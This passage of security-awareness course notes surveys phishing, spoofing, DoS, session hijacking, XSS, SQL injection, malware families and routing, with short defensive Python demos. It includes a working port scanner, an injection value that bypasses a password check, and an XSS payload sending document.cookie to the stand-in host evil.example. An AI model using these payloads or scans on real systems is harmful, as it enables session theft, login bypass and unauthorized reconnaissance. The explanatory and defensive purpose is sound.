malware used to steal confidential information.

Facebook Phishing attacks are often much more elaborate. Consider the following scenario: a link
posted by an attacker includes a picture or phrase that entices the user to click on it.
The user clicks and is redirected to a mirror website that asks him to "like" the post
before even viewing it. The user, not suspecting any harm, clicks the "like" button but
doesn't realize that the button has been spoofed and is in reality an "accept" button granting the
fake app access to the user's personal information. At this point data is collected and the account
becomes compromised. For recommendations on how to protect your Facebook account and
avoid falling prey to Facebook Phishing, have a look at the Security Response blog referenced
below.
Reference:

Phishers Use Malware in Fake Facebook App


https://www-secure.symantec.com/connect/blogs/phishers-use-malware-fake-facebook-app

• Spear Phishing Attack - this is a type of Phishing attack targeted at specific individuals,
groups of individuals or companies. Spear Phishing attacks are performed mostly with the primary
purpose of industrial espionage and theft of sensitive information, while ordinary Phishing attacks
are directed at the wide public with the intent of financial fraud. It has been estimated that in the last
couple of years targeted Spear Phishing attacks have become more widespread than ever before.
Video: Protect Against Spear Phishing and Advanced Targeted Attacks with Symantec
The recommendations to protect your company against Phishing and Spear Phishing
include:
1. Never open or download a file from an unsolicited email, even from someone you know (you
can call or email the person to double check that it really came from them)
2. Keep your operating system updated
3. Use a reputable anti-virus program
4. Enable two factor authentication whenever available
5. Confirm the authenticity of a website prior to entering login credentials by looking for a
reputable security trust mark
6. Look for HTTPS in the address bar when you enter any sensitive personal information on a
website to make sure your data will be encrypted
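Recommendation 6 above can be automated in a rudimentary way. The sketch below (the bank hostname is a made-up example) checks that a link taken from an email uses HTTPS and points at exactly the expected host before any credentials are entered; real phishing defenses of course need far more than this (certificate validation, reputation services, etc.):

```python
from urllib.parse import urlparse

def looks_legitimate(url, expected_host):
    """Rudimentary check: HTTPS scheme and an exact hostname match."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname == expected_host

# "www.examplebank.com" is a hypothetical bank used only for illustration.
print(looks_legitimate("https://www.examplebank.com/login", "www.examplebank.com"))   # True
print(looks_legitimate("http://www.examplebank.com/login", "www.examplebank.com"))    # False: no HTTPS
# A classic phishing trick: the real domain is evil.net, not examplebank.com.
print(looks_legitimate("https://www.examplebank.com.evil.net/login", "www.examplebank.com"))  # False
```

The third case shows why an exact hostname comparison matters: a substring check would be fooled by a lookalike subdomain.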
Source:
One Phish, Two Phish, Classic Phish, SPEAR Phish?!
https://www-secure.symantec.com/connect/blogs/one-phish-two-phish-classic-phish-spear-phish

• Watering Hole Attack - a more complex type of Phishing attack. Instead of the usual
approach of sending spoofed emails to end users in order to trick them into revealing confidential
information, attackers use a multi-staged approach to gain access to the targeted information. In
the first step the attacker profiles the potential victim, collecting information about his or her
internet habits, history of visited websites, etc. In the next step the attacker uses that knowledge to
inspect specific legitimate public websites for vulnerabilities. If any vulnerabilities or
loopholes are found, the attacker compromises the website with his own malicious code. The
compromised website then waits for the targeted victim to come back and infects them
with exploits (often targeting zero-day vulnerabilities) or malware. The name is an analogy to a
lion waiting at the watering hole for its prey.
Reference:
Internet Explorer Zero-Day Used in Watering Hole Attack: Q&A
https://www-secure.symantec.com/connect/blogs/internet-explorer-zero-day-used-watering-hole-
attack-qa

• Whaling - a type of Phishing attack specifically targeted at senior executives or other
high-profile targets within a company.

• Vishing (Voice Phishing or VoIP Phishing) - the use of social engineering techniques over the
telephone system to extract confidential information from users. This Phishing attack is
often combined with caller ID spoofing, which masks the real source phone number and instead
displays a number familiar to the Phishing victim or known to belong to a real banking
institution. Common Vishing practice includes pre-recorded automated instructions
requesting users to provide bank account or credit card information for verification over the
phone.
• Port scanning - an attack type where the attacker sends requests to a range of ports on
a targeted host in order to find out which ports are active and open, which then allows him to
exploit known service vulnerabilities associated with specific ports. Port scanning can be used by
malicious attackers to compromise security, as well as by IT professionals to verify
network security.
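A basic TCP connect scan of the kind described above can be sketched in a few lines of Python. This is a simplified illustration, not a full scanner, and it deliberately probes only the local machine: scanning hosts you do not own or administer is illegal in many jurisdictions.

```python
import socket

def scan(host, ports, timeout=0.5):
    """Return the subset of ports that accept a TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the TCP handshake succeeds (port open)
            # and an error code otherwise, without raising an exception.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Example: probe a few ports on the local machine only.
print(scan("127.0.0.1", range(8000, 8010)))
```

A full connect scan like this is noisy and easy to log; real attackers often use stealthier techniques (half-open SYN scans, for example), which is why intrusion-prevention products watch for the pattern rather than individual connections.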

Symantec Endpoint Protection can detect and block port scan attacks. The detection
condition is fulfilled when SEP detects more than 4 local ports being accessed by the
same remote IP within 200 seconds.
Reference:
What triggers a port scan detection in Symantec Endpoint Protection (SEP)
http://www.symantec.com/business/support/index?page=content&id=TECH165237
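The detection rule quoted above (more than 4 local ports accessed by the same remote IP within 200 seconds) can be modeled as a sliding-window counter. The sketch below is my own simplified simulation of that idea, not SEP's actual implementation; only the two threshold numbers come from the documented rule.

```python
from collections import defaultdict

WINDOW_SECONDS = 200
PORT_THRESHOLD = 4   # detection fires when MORE than 4 distinct ports are hit

def detect_port_scans(events):
    """events: iterable of (timestamp, remote_ip, local_port) tuples.
    Returns the set of remote IPs that touched more than PORT_THRESHOLD
    distinct local ports within a WINDOW_SECONDS span."""
    seen = defaultdict(list)          # remote_ip -> [(timestamp, port), ...]
    flagged = set()
    for ts, ip, port in sorted(events):
        # Drop events that have fallen out of the sliding window.
        hits = seen[ip] = [(t, p) for t, p in seen[ip] if ts - t <= WINDOW_SECONDS]
        hits.append((ts, port))
        if len({p for _, p in hits}) > PORT_THRESHOLD:
            flagged.add(ip)
    return flagged

events = [(t, "10.0.0.99", 1000 + t) for t in range(6)]        # 6 ports in 6 seconds
events += [(t * 300, "10.0.0.7", 2000 + t) for t in range(6)]  # too slow to trigger
print(detect_port_scans(events))  # {'10.0.0.99'}
```

The second host probes just as many ports but spaced 300 seconds apart, so each probe falls outside the window of the previous one and no detection fires; this is exactly why slow, "low and slow" scans are harder to catch.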
• Spoofing - a technique used to masquerade a person, program or address as another by
falsifying data, with the purpose of gaining unauthorized access. A few of the common
spoofing types:

1. IP Address spoofing - the process of creating IP packets with a forged source IP address to
impersonate a legitimate system. This kind of spoofing is often used in DoS attacks (Smurf
Attack).

2. ARP spoofing (ARP Poisoning) - the process of sending forged ARP messages in the network.
The purpose of this spoofing is to associate the attacker's MAC address with the IP address of another
legitimate host, causing traffic to be redirected to the attacker's host. This kind of spoofing is often used
in man-in-the-middle attacks.

3. DNS spoofing (DNS Cache Poisoning) - an attack where forged data is inserted into a
DNS server's cache, causing the DNS server to divert traffic by returning wrong IP addresses
in response to client queries.

4. Email spoofing - the process of faking an email's "From" field in order to hide the real origin
of the email. This type of spoofing is often used in spam mail or during Phishing attacks.
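How trivially the "From" field can be forged is easy to demonstrate with Python's standard email library; the header is plain text that nothing verifies at composition time. The addresses below are made up, and actually delivering such a message today would additionally run into the receiving server's SPF/DKIM/DMARC checks:

```python
from email.message import EmailMessage

msg = EmailMessage()
# Nothing validates this header when the message is composed -
# it is whatever text the author chooses to put there.
msg["From"] = "security@examplebank.com"   # forged, hypothetical sender
msg["To"] = "victim@example.org"
msg["Subject"] = "Please verify your account"
msg.set_content("Click the link below to confirm your details...")

print(msg["From"])  # security@examplebank.com
```

This is why the "From" line alone is never proof of a message's origin; authentication has to come from the transport layer (SPF, DKIM signatures), not from the header text.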

5. Search engine poisoning - attackers take advantage of high-profile news items or
popular events that may be of specific interest to a certain group of people in order to spread malware and
viruses. This is performed by various methods whose purpose is to achieve the highest possible
search ranking on known search portals for the malicious sites and links introduced by the
attackers. Search engine poisoning techniques are often used to distribute rogue security products
(scareware) to users searching for legitimate security solutions to download.

• Network sniffing (Packet sniffing) - the process of capturing the data packets travelling in
the network. Network sniffing can be used by IT professionals to analyse and monitor
traffic, for example to find unexpected suspicious traffic, but also by perpetrators to
collect data sent in clear text, which is easily readable with network sniffers (protocol
analysers). The best countermeasure against sniffing is the use of encrypted communication between
the hosts.

• Denial of Service Attack (DoS Attack) and Distributed Denial of Service
Attack (DDoS Attack) - an attack designed to cause an interruption or suspension of the services
of a specific host/server by flooding it with large quantities of useless traffic or external
communication requests. When the DoS attack succeeds, the server is no longer able to answer
even legitimate requests. This can be observed in a number of ways: slow response from the
server, slow network performance, unavailability of software or a web page, inability to access
data, a website or other resources. A Distributed Denial of Service Attack (DDoS) occurs when
multiple compromised or infected systems (a botnet) flood a particular host with traffic
simultaneously.

Video: Symantec Guide to Scary Internet Stuff - Denial of Service Attacks


Reference:
DoS (denial-of-service) attack
http://www.symantec.com/security_response/glossary/define.jsp?letter=d&word=dos-denial-of-
service-attack
A few of the most common DoS attack types:

♦ ICMP flood attack (Ping Flood) - an attack that sends ICMP ping requests to the
victim host without waiting for answers, in order to overload it with ICMP traffic to the point
where the host cannot respond any more, either because of network bandwidth
congestion with ICMP packets (both requests and replies) or because of high CPU utilization caused by
processing the ICMP requests. The easiest way to protect against the various types of ICMP flood
attacks is either to disable propagation of ICMP traffic sent to the broadcast address on the router or
to disable ICMP traffic at the firewall level.
♦ Ping of Death (PoD) - an attack that involves sending a malformed or otherwise corrupted
malicious ping to the host machine, for example a PING with a bigger size than usual,
which can cause a buffer overflow on the system, leading to a system crash.

♦ Smurf Attack - a variant of the Ping Flood attack with one major difference: the attacker
sends ICMP echo requests to a network broadcast address while spoofing the source IP address
with the address of the intended victim. Every host that receives the broadcast then replies to the
victim, so the victim is flooded with large numbers of ICMP replies while the network carrying
the broadcast traffic is disrupted as well.
Reference:
ICMP Smurf Denial of Service
http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20611

♦ SYN flood attack - an attack that exploits the way the TCP 3-way handshake works when a
TCP connection is being established. In the normal process, the local host sends a TCP SYN
packet to the remote host requesting a connection. The remote host answers with a TCP SYN-
ACK packet confirming that the connection can be made. As soon as this is received, the local
host replies with a TCP ACK packet to the remote host, and at this point the TCP socket
connection is established. During a SYN flood attack, the attacker host, or more commonly
several attacker hosts, send SYN packets to the victim host requesting connections; the victim
host responds with SYN-ACK packets, but the attacker hosts never respond with the final ACK
packets. As a result, the victim host keeps reserving resources for all those half-open connections,
still awaiting responses from the remote attacker hosts, which never arrive. This leaves the server
with dead open connections and in the end prevents legitimate hosts from connecting to the
server at all.
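The half-open connection exhaustion described above can be modeled with a small simulation. The backlog size below is an arbitrary illustrative number; real kernels use tunables such as a SYN backlog limit and defenses like SYN cookies, none of which are modeled here.

```python
class Listener:
    """Toy model of a TCP listener with a fixed half-open (SYN) backlog."""

    def __init__(self, backlog=5):
        self.backlog = backlog
        self.half_open = set()   # peers that sent SYN but never sent the final ACK

    def on_syn(self, peer):
        if len(self.half_open) >= self.backlog:
            return "dropped"     # backlog full: further SYNs are refused
        self.half_open.add(peer)
        return "syn-ack sent"

    def on_ack(self, peer):
        self.half_open.discard(peer)   # handshake completed, slot freed
        return "established"

listener = Listener(backlog=5)
for i in range(5):                           # attacker sends 5 SYNs, never ACKs
    listener.on_syn(f"attacker-{i}")
print(listener.on_syn("legitimate-client"))  # dropped
```

Once the attacker's half-open entries fill the backlog, the legitimate client's SYN is refused even though the server is otherwise idle, which is the essence of the attack.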

♦ Buffer Overflow Attack - in this type of attack the victim host is provided with
traffic/data that is outside the range of what the victim host, its protocols or
applications can process, overflowing the buffer and overwriting adjacent memory. One example is
the Ping of Death attack mentioned above, where a malformed ICMP packet with a size exceeding the
normal value can cause a buffer overflow.

• Botnet - a collection of compromised computers that can be controlled by remote perpetrators
to perform various types of attacks on other computers or networks. A well-known example of botnet
usage is the distributed denial of service attack, where multiple systems submit as many
requests as possible to the victim machine in order to overload it with incoming packets. Botnets
can otherwise be used to send out spam, spread viruses and spyware, and also to steal personal
and confidential information, which is afterwards forwarded to the botmaster.
Video: Symantec Guide to Scary Internet Stuff - Botnets

Beginning in October 2013, Symantec disabled 500,000 botnet-infected computers belonging
to the almost 1.9 million strong ZeroAccess botnet. According to Symantec, ZeroAccess is the largest
actively controlled botnet in existence today, amounting to approximately 1.9 million infected
computers on any given day. It is the largest known botnet that utilizes a peer-to-peer (P2P)
mechanism for communication. ZeroAccess is a Trojan horse that uses advanced means to hide
itself by creating hidden file systems to store core components, download additional malware,
and open a back door on the compromised computer. The primary motivation behind the
ZeroAccess botnet is financial fraud through pay-per-click (PPC) advertising and bitcoin
mining.
Reference:
[Trojan.Zeroaccess]
http://www.symantec.com/security_response/writeup.jsp?docid=2011-071314-0410-99
Grappling with the ZeroAccess Botnet
https://www-secure.symantec.com/connect/blogs/grappling-zeroaccess-botnet
ZeroAccess Indepth
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeroac
cess_indepth.pdf
Press articles:
Symantec disables 500,000 botnet-infected computers
http://www.bbc.co.uk/news/technology-24348395
Symantec seizes part of massive peer-to-peer botnet ZeroAccess
http://www.pcworld.com/article/2050800/symantec-seizes-part-of-massive-peertopeer-botnet-
zeroaccess.html
Symantec takes on one of largest botnets in history
http://news.cnet.com/8301-1009_3-57605411-83/symantec-takes-on-one-of-largest-botnets-in-
history
• Man-in-the-middle Attack - a form of active monitoring or eavesdropping on a
victim's connections and on the communication between victim hosts. This form of attack also
includes interaction between both victim parties of the communication and the attacker; this is
achieved by the attacker intercepting all parts of the communication, changing its content and
sending it back as legitimate replies. Neither communicating party is aware of the attacker's
presence, and both believe the replies they get are legitimate. For this attack to succeed, the
perpetrator must successfully impersonate at least one of the endpoints. This can be the case if
there are no protocols in place that ensure mutual authentication or encryption during the
communication process.

• Session Hijacking Attack - an attack that exploits a valid computer session in order
to gain unauthorized access to information on a computer system. This attack type is often
referred to as cookie hijacking because, during its progress, the attacker uses a stolen session cookie
to gain access and authenticate to a remote server by impersonating the legitimate user.
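One common mitigation on the server side is signing the session identifier so that a forged or tampered cookie is rejected. The sketch below uses Python's standard hmac module; the secret key and the cookie format are illustrative choices of mine, not a specific framework's scheme.

```python
import hashlib
import hmac

SECRET = b"server-side secret key"   # hypothetical; never hardcode a real key

def make_cookie(session_id: str) -> str:
    """Append an HMAC-SHA256 signature to the session id."""
    sig = hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()
    return f"{session_id}.{sig}"

def verify_cookie(cookie: str) -> bool:
    """Recompute the signature and compare in constant time."""
    session_id, _, sig = cookie.rpartition(".")
    expected = hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking information through timing differences
    return hmac.compare_digest(sig, expected)

cookie = make_cookie("user42-session")
print(verify_cookie(cookie))                        # True
print(verify_cookie("forged-session." + "0" * 64))  # False
```

Note that signing prevents forgery and tampering but does not stop replay of a cookie stolen intact; defending against that requires transport encryption (TLS), short session lifetimes and server-side invalidation.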

• Cross-site scripting Attack (XSS Attack) - the attacker exploits XSS vulnerabilities
found in web server applications in order to inject a client-side script into the webpage, which can
either point the user to a malicious website of the attacker or allow the attacker to steal the user's
session cookie.
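The standard server-side defense is to escape user-supplied input before embedding it in HTML, so the browser renders the text instead of executing it. Python's built-in html.escape shows the idea; the injected script is a typical cookie-stealing example, with a made-up attacker URL:

```python
import html

# Typical XSS payload: a script that ships the session cookie to the attacker.
user_input = '<script>document.location="http://evil.example/?c="+document.cookie</script>'

# Escaping turns markup characters into harmless HTML entities.
safe = html.escape(user_input)
page = f"<p>Comment: {safe}</p>"
print(page)
```

After escaping, `<` and `>` become `&lt;` and `&gt;`, so no `<script>` element ever reaches the browser's parser. In practice this should be done by the templating engine automatically, for every value, on output.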

• SQL Injection Attack - the attacker uses existing vulnerabilities in an application to inject
code for execution through input that exceeds what the application expects and checks,
allowing arbitrary SQL statements to reach the database.
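A short sketch with Python's built-in sqlite3 module shows both the vulnerability and the standard fix (the table, column and values are invented for the example): string-formatting user input into the SQL text lets an attacker smuggle in extra clauses, while a parameterized query treats the same input purely as data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

attacker_input = "' OR '1'='1"

# VULNERABLE: the input is concatenated into the SQL text, so the
# injected OR clause makes the WHERE condition match every row.
query = f"SELECT name FROM users WHERE password = '{attacker_input}'"
print(conn.execute(query).fetchall())   # [('alice',)] - check bypassed

# SAFE: a parameterized query binds the input as a value, never as SQL.
rows = conn.execute("SELECT name FROM users WHERE password = ?",
                    (attacker_input,)).fetchall()
print(rows)                             # [] - no row has that literal password
```

The `?` placeholder is sqlite3's binding syntax; other database drivers use `%s` or named parameters, but the principle is the same everywhere: never build SQL by pasting user input into the statement text.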

• Bluetooth related attacks


♦ Bluesnarfing - this kind of attack allows the malicious user to gain unauthorized access to
information on a device through its Bluetooth connection. Any device with Bluetooth turned on
and set to the "discoverable" state may be prone to a bluesnarfing attack.
♦ Bluejacking - this kind of attack allows the malicious user to send unsolicited (often spam)
messages over Bluetooth to Bluetooth-enabled devices.
♦ Bluebugging - a hack attack on a Bluetooth-enabled device. Bluebugging enables the attacker to
initiate phone calls on the victim's phone, as well as read through the address book and messages
and eavesdrop on phone conversations.

Malware
Malware, short for malicious software, is an umbrella term used to refer to a variety of forms of
hostile or intrusive software,[1] including computer viruses, worms, trojan horses, ransomware,
spyware, adware, scareware, and other malicious programs. It can take the form of executable
code, scripts, active content, and other software.[2] Malware is defined by its malicious intent,
acting against the requirements of the computer user - and so does not include software that
causes unintentional harm due to some deficiency.
Software such as anti-virus and firewalls are used to protect against activity identified as
malicious, and to recover from attacks.[4]
Today, malware is used by both black hat hackers and governments, to steal personal, financial,
or business information.[5][6]
Malware is sometimes used broadly against government or corporate websites to gather guarded
information,[7] or to disrupt their operation in general. However, malware is often used against
individuals to gain information such as personal identification numbers or details, bank or credit
card numbers, and passwords.
Since the rise of widespread broadband Internet access, malicious software has more frequently
been designed for profit. Since 2003, the majority of widespread viruses and worms have been
designed to take control of users' computers for illicit purposes.[8] Infected "zombie computers"
are used to send email spam, to host contraband data such as child pornography,[9] or to engage
in distributed denial-of-service attacks as a form of extortion.[10]
Programs designed to monitor users' web browsing, display unsolicited advertisements, or
redirect affiliate marketing revenues are called spyware. Spyware programs do not spread like
viruses; instead they are generally installed by exploiting security holes. They can also be hidden
and packaged together with unrelated user-installed software.[11]
Ransomware affects an infected computer in some way, and demands payment to reverse the
damage. For example, programs such as CryptoLocker encrypt files securely, and only decrypt
them on payment of a substantial sum of money.
Some malware is used to generate money by click fraud, making it appear that the computer user
has clicked an advertising link on a site, generating a payment from the advertiser. It was
estimated in 2012 that about 60 to 70% of all active malware used some kind of click fraud, and
22% of all ad-clicks were fraudulent.
The best-known types of malware, viruses and worms, are known for the manner in which they
spread, rather than any specific types of behavior. The term computer virus is used for a program
that embeds itself in some other executable software (including the operating system itself) on
the target system without the user's consent and when that is run causes the virus to spread to
other executables. On the other hand, a worm is a stand-alone malware program that actively
transmits itself over a network to infect other computers. These definitions lead to the
observation that a virus requires the user to run an infected program or operating system for the
virus to spread, whereas a worm spreads itself.[15]

Adware, Toolbars and Hijackers


Adware
Adware is a type of malware which downloads advertisement content from the internet and displays it
in the form of pop-ups, pop-unders, etc. Once adware is installed on a computer, it is not dependent on
your browser and can display advertisements stand-alone. Pop-up blockers also cannot block these
pop-ups. Adware is always an annoyance to the computer user.

Toolbars
Toolbars are available as plug-ins to browsers and provide additional functionality such as search forms or
pop-up blockers. Examples of useful toolbars are the Google Toolbar, Yahoo Toolbar, Ask Toolbar, etc. There are
also malware toolbar plug-ins which are installed without the user's consent, display advertisements and perform
other nuisance activities.
Hijackers
Hijackers are another type of malware that takes control of the behavior of your web browser, such as the home page,
default search pages, toolbars, etc. Hijackers redirect your browser to another URL if you mistype the URL of the
website you want to visit. Hijackers can also prevent you from opening a particular website. Hijackers are an
annoyance to users who use the browser often.

What are keyloggers (keystroke loggers)?


A keylogger or keystroke logger is a program or hardware device that logs every keystroke you make
on your computer and then sends that information, including passwords, bank account numbers
and credit card numbers, to whoever controls the malware.

A hardware keylogger is a small hardware device which is normally installed between the
keyboard port and the keyboard. The hardware keylogger then tracks all user keystrokes and saves
them to its internal memory. Hardware keyloggers are available in different memory
capacities.

A software keylogger is a program which can track all the keystrokes of the user and save them on the
computer. Software keyloggers are normally cheaper than hardware keyloggers. A software
keylogger runs invisibly to the user being monitored and hides itself from the Task Manager and
from Add/Remove Programs. Many software keyloggers also support remote installation.

Computer Viruses
A Computer Virus is another type of malware which, when executed, tries to replicate itself into
other executable code available on the infected computer. If the virus succeeds, that
executable code is in turn infected with the computer virus, and when the infected code is
executed it can again infect other executable code. This self-replication capability is the key
difference between a virus and other malware.
Normally, viruses propagate within a single computer, or may travel from one computer to
another using storage media like CD-ROMs, DVD-ROMs, USB flash drives, etc.
A Computer Virus program normally has the following mechanisms:
• A propagation mechanism that allows the virus to move from one computer to another
computer.
• A replication mechanism that allows the virus to attach itself to another executable program.
• A trigger mechanism that is designed to execute the replication mechanism of the virus.
• A payload designed to perform the mischievous activities on the victim computer.

Different types of Computer Viruses - Computer Virus Classification


Computer Viruses are classified according to their nature of infection and behavior. The different types of computer
virus classification are given below.

• Boot Sector Virus: A Boot Sector Virus infects the first sector of the hard drive, where the Master Boot Record
(MBR) is stored. The Master Boot Record (MBR) stores the disk's primary partition table and the
bootstrapping instructions which are executed after the computer's BIOS passes execution to machine code. If a
computer is infected with a Boot Sector Virus, when the computer is turned on the virus launches immediately
and is loaded into memory, enabling it to control the computer.

• File Deleting Viruses: A File Deleting Virus is designed to delete critical files which are part of the Operating
System, or data files.

• Mass Mailer Viruses: Mass Mailer Viruses search e-mail programs like MS Outlook for e-mail addresses
stored in the address book and replicate by e-mailing themselves to the addresses stored in the address
book of the e-mail program.

• Macro viruses: Macro viruses are written using macro programming languages like VBA, which is a
feature of the MS Office package. A macro is a way to automate and simplify a task that you perform repeatedly in
the MS Office suite (MS Excel, MS Word, etc.). These macros are usually stored as part of the document or
spreadsheet and can travel to other systems when these files are transferred to other computers.

• Polymorphic Viruses: Polymorphic Viruses change their appearance and their code, for example by
encrypting parts of the virus itself, every time they infect a different system. This mutation helps
Polymorphic Viruses hide from anti-virus software and avoid detection and disinfection.

• Armored Viruses: Armored Viruses are a type of virus designed and written to make themselves difficult
to detect or analyze. An Armored Virus may also have the ability to protect itself from antivirus programs,
making it more difficult to disinfect.

• Stealth viruses: Stealth viruses have the capability to hide from the operating system or anti-virus software by
concealing the changes they make to file sizes or directory structures. Stealth viruses are anti-heuristic in nature,
which helps them hide from heuristic detection.

• Retrovirus: A Retrovirus is another type of virus which tries to attack and disable the anti-virus application
running on the computer. A retrovirus can be considered anti-antivirus. Some Retroviruses attack the anti-virus
application and stop it from running, while others destroy the virus definition database.

• Multiple Characteristic viruses: Multiple Characteristic viruses combine the characteristics and
capabilities of several of the virus types above.

Computer Worms, different types of computer worms


A worm has characteristics similar to a virus. Worms are also self-replicating, but a worm
replicates in a different way. Worms are standalone, and once a worm has infected a
computer, it searches for other computers connected through a local area network (LAN) or
Internet connection. When the worm finds another computer, it replicates itself to the new
computer and continues to search for further computers on the network to infect.
Due to this replication through the network, a worm normally consumes significant system
resources, including network bandwidth, causing network servers to stop responding.
Different types of Computer Worms are:

• Email Worms: Email Worms spread through infected email messages as an attachment or a
link of an infected website.
• Instant Messaging Worms: Instant Messaging Worms spread by sending links to the contact
list of instant messaging applications.
• Internet Worms: An Internet Worm scans all available network resources using local operating
system services and/or scans the Internet for vulnerable machines. If a vulnerable computer is
found, the worm attempts to connect to it and gain access.
• IRC Worms: IRC Worms spread through IRC chat channels, sending infected files or links to
infected websites.
• File-sharing Networks Worms: File-sharing Networks Worms place a copy of themselves in a shared
folder and spread via P2P networks.

Rootkits, Different types of rootkits


A rootkit is another type of malware that has the capability to conceal itself from the Operating System and
antivirus applications on a computer. A rootkit provides continuous root-level (super user) access to the
computer where it is installed. The name rootkit comes from the UNIX world, where the super user account is
"root" and a "kit" is the set of tools providing that access.

Rootkits are installed by an attacker for a variety of purposes: rootkits can provide the attacker root-level
access to the computer via a back door, conceal other malware installed on the target computer, turn the
compromised computer into a zombie for network attacks, or be used to steal encryption keys and
passwords. Rootkits are more dangerous than other types of malware because they are difficult to detect
and cure.

Different types of Rootkits are explained below.

Application Level Rootkits: Application level rootkits operate inside the victim computer by replacing
standard application files with rootkit files, or by changing the behavior of existing applications with patches,
injected code, etc.

Kernel Level Rootkits: The kernel is the core of the Operating System, and Kernel Level Rootkits are created
by adding additional code to, or replacing portions of, the core operating system with modified code, via
device drivers (in Windows) or Loadable Kernel Modules (in Linux). Kernel Level Rootkits can have a serious
effect on the stability of the system if the kit's code contains bugs. Kernel rootkits are difficult to detect
because they run with the same privileges as the Operating System and can therefore intercept or subvert
operating system operations.

Hardware/Firmware Rootkits: Hardware/firmware rootkits hide themselves in hardware such as a network
card, the system BIOS, etc.

Hypervisor (Virtualized) Level Rootkits: Hypervisor level rootkits are created by exploiting hardware
features such as Intel VT or AMD-V (hardware-assisted virtualization technologies). A hypervisor level
rootkit hosts the target operating system as a virtual machine and can therefore intercept all hardware calls
made by the target operating system.

Boot Loader Level Rootkits (Bootkits): Bootkits replace or modify the legitimate boot loader with one of
their own, so the rootkit is activated even before the operating system starts. Bootkits are a serious threat to
security because they can be used to steal encryption keys and passwords.

Viruses
A computer program usually hidden within another seemingly innocuous program that produces
copies of itself and inserts them into other programs or files, and that usually performs a
malicious action (such as destroying data).[17]
Trojan horses
A trojan is a malicious computer program which misrepresents itself to appear useful, routine,
or interesting in order to persuade a victim to install it. The term is derived from the Ancient
Greek story of the Trojan Horse used to invade the city of Troy by stealth.[18][19][20][21][22]
Trojans are generally spread by some form of social engineering, for example where a user is
duped into executing an e-mail attachment disguised to be unsuspicious (e.g., a routine form to
be filled in), or by drive-by download. Although their payload can be anything, many modern
forms act as a backdoor, contacting a controller which can then have unauthorized access to the
affected computer.[23] While Trojans and backdoors are not easily detectable by themselves,
computers may appear to run slower due to heavy processor or network usage.
Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into
other files or otherwise propagate themselves.[24]
Rootkits
Once a malicious program is installed on a system, it is essential that it stays concealed, to avoid
detection. Software packages known as rootkits allow this concealment, by modifying the host's
operating system so that the malware is hidden from the user. Rootkits can prevent a malicious
process from being visible in the system's list of processes, or keep its files from being read.[25]
Some malicious programs contain routines to defend against removal, not merely to hide
themselves. An early example of this behavior is recorded in the Jargon File tale of a pair of
programs infesting a Xerox CP-V time sharing system:
Each ghost-job would detect the fact that the other had been killed, and would start a new copy
of the recently stopped program within a few milliseconds. The only way to kill both ghosts was
to kill them simultaneously (very difficult) or to deliberately crash the system.[26]
Backdoors
A backdoor is a method of bypassing normal authentication procedures, usually over a
connection to a network such as the Internet. Once a system has been compromised, one or more
backdoors may be installed in order to allow access in the future,[27] invisibly to the user.
The idea has often been suggested that computer manufacturers preinstall backdoors on their
systems to provide technical support for customers, but this has never been reliably verified. It
was reported in 2014 that US government agencies had been diverting computers purchased by
those considered "targets" to secret workshops where software or hardware permitting remote
access by the agency was installed, considered to be among the most productive operations to
obtain access to networks around the world.[28] Backdoors may be installed by Trojan horses,
worms, implants, or other methods.[29][30]
Evasion
Since the beginning of 2015, a sizable portion of malware utilizes a combination of many
techniques designed to avoid detection and analysis.[31]
• The most common evasion technique is when the malware evades analysis and detection
by fingerprinting the environment when executed.[32]
• The second most common evasion technique is confusing automated tools' detection
methods. This allows malware to avoid detection by technologies such as signature-based
antivirus software by changing the server used by the malware.[33]
• The third most common evasion technique is timing-based evasion. This is when
malware runs at certain times or following certain actions taken by the user, so it executes
during certain vulnerable periods, such as during the boot process, while remaining
dormant the rest of the time.
• The fourth most common evasion technique is done by obfuscating internal data so that
automated tools do not detect the malware.[34]
• An increasingly common technique is adware that uses stolen certificates to disable
anti-malware and virus protection; technical remedies are available to deal with the adware.[35]
Nowadays, one of the most sophisticated and stealthy ways of evasion is to use information
hiding techniques, namely stegomalware.

Routing
Routing is the process of selecting a path for traffic in a network, or between or across multiple
networks. Routing is performed for many types of networks, including circuit-switched
networks, such as the public switched telephone network (PSTN), computer networks, such as
the Internet, as well as in networks used in public and private transportation, such as the system
of streets, roads, and highways in national infrastructure.
In packet switching networks, routing is the higher-level decision making that directs network
packets from their source toward their destination through intermediate network nodes by
specific packet forwarding mechanisms. Packet forwarding is the transit of logically addressed
network packets from one network interface to another. Intermediate nodes are typically network
hardware devices such as routers, bridges, gateways, firewalls, or switches. General-purpose
computers also forward packets and perform routing, although they have no specially optimized
hardware for the task. The routing process usually directs forwarding on the basis of routing
tables, which maintain a record of the routes to various network destinations. Thus, constructing
routing tables, which are held in the router's memory, is very important for efficient routing.
Most routing algorithms use only one network path at a time. Multipath routing techniques
enable the use of multiple alternative paths.
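The routing-table lookup described above can be sketched as a longest-prefix match: when several table entries contain the destination address, the most specific one wins. This is a minimal sketch; the prefixes and next-hop names below are invented for illustration.

```python
import ipaddress

# Hypothetical routing table: prefix -> next hop name.
ROUTES = {
    ipaddress.ip_network("0.0.0.0/0"): "isp-gateway",   # default route
    ipaddress.ip_network("10.0.0.0/8"): "core-router",
    ipaddress.ip_network("10.1.2.0/24"): "branch-router",
}

def next_hop(dst: str) -> str:
    """Return the next hop for dst using longest-prefix match."""
    addr = ipaddress.ip_address(dst)
    matches = [net for net in ROUTES if addr in net]
    # The most specific matching prefix (largest prefix length) wins.
    best = max(matches, key=lambda net: net.prefixlen)
    return ROUTES[best]

print(next_hop("10.1.2.7"))   # matches the /24, the most specific route
print(next_hop("10.9.9.9"))   # falls back to the /8 route
print(next_hop("8.8.8.8"))    # only the default route matches
```

Real routers use specialized data structures (such as tries) for this lookup, but the selection rule is the same.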
Routing, in a narrower sense of the term, is often contrasted with bridging in its assumption that
